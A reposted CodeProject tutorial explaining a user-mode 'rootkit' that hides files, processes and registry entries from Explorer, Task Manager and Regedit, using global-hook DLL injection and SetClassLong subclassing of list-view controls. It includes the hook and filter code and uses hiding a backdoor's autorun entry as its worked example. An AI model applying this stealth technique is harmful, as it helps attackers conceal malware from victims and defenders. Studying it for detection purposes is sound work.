KitKat - The Lazy/Poor Man's Rootkit
来源:互联网 发布:淘宝推广工具排名 编辑:程序博客网 时间:2024/05/01 20:36
目录(?)[-]
- Introduction
- Background
- Disclaimer
- Using the code
- Theory
- DLL injection
- Working
- Hooking The ListView Procedure
- Filter Function
- Summary
- DrawBacks
- FAQ
- Authors Notes
- History
- License
- About the Author
原帖:http://www.codeproject.com/KB/threads/Kitkat.aspx
- Download Kitkat - 3.89 KB
- Download DllTester - 2.51 KB
Introduction
The Following Article is About Using Global Hooks and Window Subclassing to create a pseudo-Rootkit capable of hiding files from Explorer,Task Manager,Registry Editor,etc
Background
You must know basic C++. Windows Programming, Global Hooks (for dll injection). You Must ofcourse, Know what a RootKit is?
Disclaimer
Though The program is well tested i have to include this disclaimer. The Following Program Attempts to Modify your Operating System, which may/can make your system unstable. By Executing/Compiling The Program you agree that The author nor the site hosting this article shall not be held responsible for any damages occured due to the this program. This Program Comes with NO WARRANTY. USE AT YOUR OWN RISK!! If this scares you, you probably shouldn't run this Program. The Author Hereby disclaims himself. This article may not be re-published elsewhere without the permission of the author.
Using the code
Compile the VC++ Project to obtain a Dll. You could write your loader. But i have enclosed a Small Dll Tester Written in VB just incase. Once Loaded, the dll will establish a CallWnd Hook.
Theory
Ok, Before i start a flame war or before i get out-ed by Guru's out here, i'll like to state Kitkat is not a "System RootKit". It's More of a "User Rootkit" Not to be confused with "UserMode RootKits (Ring 3)"...
There are 2 Kinds of Rootkits
- Kernel Mode Rootkits (Run in Ring0 and Filters Requests at highest level)
- UserMode Rootkits (Runs in UserMode, uses API Redirection,IAT hooking to get the job done)
The Most Powerfull Rootkit's are no doubt The Kernel Rootkits. Usermode Rootkits are less desirable it is wellknownnot all API calls can be hooked using IAT Patching. (Link to Article)
So Which one of these does KitKat Belong to? Actually, its None of them...
See, Most Rootkits have the following model
OS ---> RootKit Filter ---> User
Every File that is being stealthed is Hidden from the system itself...which means even if one programmatically tries to locate a file, You'll not be able to...since the filter intercepts such a request....
So effectively stealthing the files/processes from BOTH the SYSTEM and THE USER. If an AntiVirus requested a File that was being stealthed...The AV would've got an "INVALID_FILE_HANDLE"
but Kitkat's Model is based on the Following Model
Windows GUI ----> Kitkat RootKit Filter ----> User
As You can see, The OS doesn't figure in the diagram...because Kitkat only modifies/affects the GUI of the System. KitKat Does NOT Stealth your Files From The System itself. It Only hides your files from the "User's Sight"....The Files can be read/written upon programmatically by any program.
For eg. Say Kitkat is hiding a file (c:/test.txt) though You won't be able to see the file using explorer.
If You tried to execute "notepad c:/test.txt" this would work fine...since the System can "SEE" the file.
The System remains unaffected, only the GUI is affected. So This Method can be used to
- Hide Process Listing (from Task Manager,etc)
- Hide Files in Explorer (Folders,Files, Common Dialog Boxes)
- Hide Entries in Registry Editor (Regedit)
I Hope Your Getting this...
DLL injection
The Dll injection method is based of Ivo Ivanov's Code. A Million Thanks to Him. Search This Site For it.
Working
Grab your Trusty Spy++ and try to find out "the classname" for the Main Window (where folders and files are displayed) used by
- Explorer.exe
- Regedit.exe
- Taskmgr.exe
- Common Dialogs (Open File,Save File)
- Etc (Pretty Much Everything on your PC)
You'll Notice all the Main Window (where folders and files are displayed) are of ClassName "SysListView32" which is popularly called a "ListView". Note, Almost Every Control in Windows is a window...They are all Created using "CreateWindow". Windows Differentiates Between a Button and a List by means of a Classname. And also Every Window has a Window Procedure.
For Each Class there are specific procedures...For a Button,The WM_COMMAND may simulate a depressed button. The same Message for a List simply highlights the selection...So you see, every Control have their own in-built default procedures...we are going to redirect this default procedure to our filter.
Kitkat.dll is going to be injected into Every Process that has a Message Queue (Using CallWnd Hook) Once Injected, Using Global Subclassing we are going to "redirect" the default window procedure of ListView to our Filter Function.
To Perform The Redirection we only need One API "SetClassLong".
Hooking The ListView Procedure
//Create temporary SysListView32 window since you need an instance of that control for SetClassLong HWND hWnd = CreateWindow("SysListView32","",0, 0, 0, 0, 0,NULL, NULL, hInstance, NULL); OldWndProc = SetClassLong(hWnd,GCL_WNDPROC,(LONG)NewWndProc); //get previous addr DestroyWindow(hWnd); //destroy it, don't need it anymore
Once This is done, Every ListView Created AFTER the hook was established will be affected...
Note : ListViews Created Before are unaffected...Just One Of the Many Drawbacks of Kitkat Method. Although it can be implemented using SetWindowLong() we'll have to remember The Old Procedure For each one of them. Hey, This is just a demo.
Notice, we Got the OldWndProc. You Need to store this...we'll be needing this to call the real procedure.
Filter Function
char temp[MAX];LONG OldWndProc;LRESULT CALLBACK NewWndProc(HWND Hwnd, UINT Message, WPARAM wParam, LPARAM lParam){switch(Message){//Why Hook the WM_PAINT? Because it was the Only Common Message i found that // was sent to all "Explorer.exe","Regedit.exe", "taskmgr.exe"case WM_PAINT://Find Number of Columns...We'll Search Every ColummnHWND hdr = (HWND)SendMessage(Hwnd,LVM_GETHEADER,0,0);int Col = SendMessage(hdr,HDM_GETITEMCOUNT,0,0);Col++;int i,j,k,itemCount = ListView_GetItemCount(Hwnd);for(i=0;i < Col;i++){for(j=0;j < itemCount;j++){ ListView_GetItemText(Hwnd,j,i,temp,MAX);strcpy(temp,_strlwr(temp));for(k=0;k < UBOUND_PROCLIST;k++){ //substring searchif(strstr(temp,procList[k])){ ListView_DeleteItem(Hwnd,j);itemCount--;j--;}}}}break;} return CallWindowProc((WNDPROC)OldWndProc, Hwnd, Message, wParam, lParam);}
Summary
Now, ListView can Have Multiple Colummns...Let's Say I'm this evil malicious hacker dude, those guys at microsoft always seem to talking about, anyways, i have my "backdoor.exe" which has created a Autorun entry in the registry...Now, I want my entry to be hidden...
- Inject Dll into Regedit.exe
- Subclass SysListView32
- Intercept WM_PAINT Message
- Search Through ALL Columns and ALL ROWS to find "backdoor.exe"
- If found delete that entire Row.
- Call Default Procedure.
DrawBacks
- Does not Affect Console Programs (coz they don't have Message Queue's)
- Any Program can "detect" files, if we are actively looking for it. Assuming the user doesn't know he's been compromised. He'll never look for it.
- Controls Created Prior to Hooking are unaffected.
FAQ
Q : Why WM_PAINT?
A : I tried to monitor all Messages that were sent to SysListView32, the only common Message that was sent to Explorer.exe,Taskmgr.exe,Regedit.exe was WM_PAINT. There are others, but they are not consistent with all Applications
Q : In Explorer, There's an Empty Space where the icon (for the stealthed file) was supposed to fall. What's with that?
A : I'm Guessing The positions are assigned before WM_PAINT is called...so when we filter the result...the space is already allocated for the icon. I Guess if we intercept any other message this could be fixed. but i haven't tried any.
Q : What is its Purpose?
A : Unfortunately, The only purpose i can tell you, involves malicious applications. But i hope something good can come out of it.
Q : Hey,I can see the Stealthed files using cmd. Can you Implement a Method that works for them?
A : It can be implemented...We'll have to Redirect "StdIn,StdOut,StdError" using Pipes but that's a story for another time. Who Knows, if i get the time i will...
Q : It Doesn't Work on my System?
A : As of now, i have tested it out on my System which is a Win2k SP4. If It doesn't work on your system please report it. So that the article can be corrected.
Q : It's a DLL, how do i execute it?
A : You could write your loader. But i have enclosed a Small Dll tester Written in VB just incase. Once Loaded, the dll will establish a CallWnd Hook. You can Customize it yourself...
Authors Notes
The Processes to Hide are hardcoded...To make it flexible you can use "ini" files to check filenames.
You can prevent the dll from injecting itself into certain process by matching g_exePath
with filename (say "explorer.exe")
More Notes in the Source Code
History
17 Feb 08 : Original Draft
License
This article, along with any associated source code and files, is licensed underThe Code Project Open License (CPOL)
About the Author
- KitKat - The Lazy/Poor Man's Rootkit
- KitKat - The Lazy/Poor Man's Rootkit
- Poor Man’s Visual Studio Cppcheck Integration
- 【2012年腾讯俱乐部ACM赛新手组1004】XOR的用法-Poor man on the Single’s Day
- Poor Man’s Training Data: Graph-Based Semi-Supervised Learning
- Rootkit Unhooker v3.8 It's Past, Present and Future of the NTx86 Rootkit Detection
- How the Poor Die
- Bill Gates Centimillionaire and one poor man.
- WOJ1045-Flymouse's Poor English
- Dead Man's Island——2、The Island
- Dead Man's Island——3、The Photograph
- Dead Man's Island——4、The Locked Room
- UVA - 10688 The Poor Giant
- About the SMM rootkit
- not to be a poor man,hadoop i'am comming
- poor
- The poor people should live a poor life in a poor way.
- WOJ:Problem 1045 - Flymouse?s Poor English
- Linux Soft Link
- Unable to Find Sources for Current Linux Kernel
- 如何安装MinGW
- Palindrome Number
- Linux开放1521端口允许网络连接Oracle Listener
- KitKat - The Lazy/Poor Man's Rootkit
- 玫瑰花Java web程序
- ThreadLocal
- warning c4273: inconsistent dll linkage
- MFC加入Skin++皮肤美化界面
- Linux 自检和 SystemTap
- Struts2自带的上传方法(简单实用)案例图片上传,文件也可,
- 用DEF文件从DLL中导出C编程++类
- DLL中导出函数的两种方式(dllexport与.def文件